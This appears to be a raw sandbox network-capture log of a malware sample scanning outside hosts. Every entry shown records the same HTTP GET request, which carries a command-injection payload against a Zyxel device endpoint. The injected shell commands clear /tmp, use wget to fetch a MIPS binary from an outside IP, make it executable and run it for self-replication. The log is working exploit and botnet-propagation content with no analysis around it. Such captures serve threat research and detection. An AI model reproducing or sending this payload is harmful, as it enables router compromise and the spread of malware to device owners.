                                                Jan 28, 2024 10:16:20.743108034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3212192.168.2.2345308187.238.131.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743139029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3213192.168.2.233579044.193.241.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743164062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3214192.168.2.2347384218.160.45.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743185043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3215192.168.2.234491674.243.236.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743221045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3216192.168.2.2359212105.225.51.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743247032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3217192.168.2.235902266.74.33.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743282080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3218192.168.2.2337824191.6.43.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743300915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3219192.168.2.2348136172.180.143.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743325949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3220192.168.2.234620684.153.101.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743379116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3221192.168.2.234470078.54.17.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743391991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3222192.168.2.2339016153.230.198.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743434906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3223192.168.2.2354208173.166.245.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743463993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3224192.168.2.2356988223.161.252.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743489027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3225192.168.2.2348978162.40.27.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743514061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3226192.168.2.233818093.59.217.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743546009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3227192.168.2.233853453.212.134.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743551970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3228192.168.2.2343558190.75.45.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743575096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3229192.168.2.2356732171.50.117.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743607998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3230192.168.2.235489089.177.22.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743643045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3231192.168.2.2333738220.10.105.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743684053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3232192.168.2.234103296.67.214.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743710995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3233192.168.2.235105299.183.179.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743722916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3234192.168.2.2353294110.232.131.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743760109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3235192.168.2.234860240.128.123.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743798018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3236192.168.2.2333048194.205.17.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743832111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3237192.168.2.234440087.227.82.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743833065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3238192.168.2.234190278.113.164.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743894100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3239192.168.2.233349244.116.222.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743912935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3240192.168.2.2353602136.168.147.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743953943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3241192.168.2.2352388164.118.16.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743978024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3242192.168.2.2336522191.31.33.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.743982077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3243192.168.2.233834439.23.166.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744013071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3244192.168.2.233341882.87.231.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744074106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3245192.168.2.2346092112.246.166.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744102001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3246192.168.2.2353762196.104.88.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744127035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3247192.168.2.2349818148.153.62.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744148016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3248192.168.2.2352200183.231.146.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744180918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3249192.168.2.2348482120.110.51.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744195938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3250192.168.2.234019244.180.167.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744230986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3251192.168.2.235355488.231.106.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744254112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3252192.168.2.2359788125.26.139.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744306087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3253192.168.2.2357512139.245.59.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744328022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3254192.168.2.235765294.99.252.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744339943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3255192.168.2.2355468148.203.143.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744365931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3256192.168.2.2359680130.38.11.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744406939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3257192.168.2.235972496.246.111.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744419098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3258192.168.2.235238480.41.172.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744457960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3259192.168.2.2356214179.183.216.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744473934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3260192.168.2.2356116105.102.252.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744499922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3261192.168.2.235083895.187.175.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744518042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3262192.168.2.2339598163.175.247.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744553089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3263192.168.2.2342192151.85.98.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744568110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3264192.168.2.23462425.56.252.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744601011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3265192.168.2.234327853.203.213.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744611025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3266192.168.2.2333690193.6.103.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744628906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3267192.168.2.2338536109.5.212.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744647026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3268192.168.2.2356120117.196.178.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744663000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3269192.168.2.2355482212.80.63.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744683027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3270192.168.2.234671434.189.80.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744729042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3271192.168.2.234361841.133.134.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744769096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3272192.168.2.235857484.152.201.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.744786978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3273192.168.2.2338436192.8.109.209443
                                                TimestampBytes transferredDirectionData
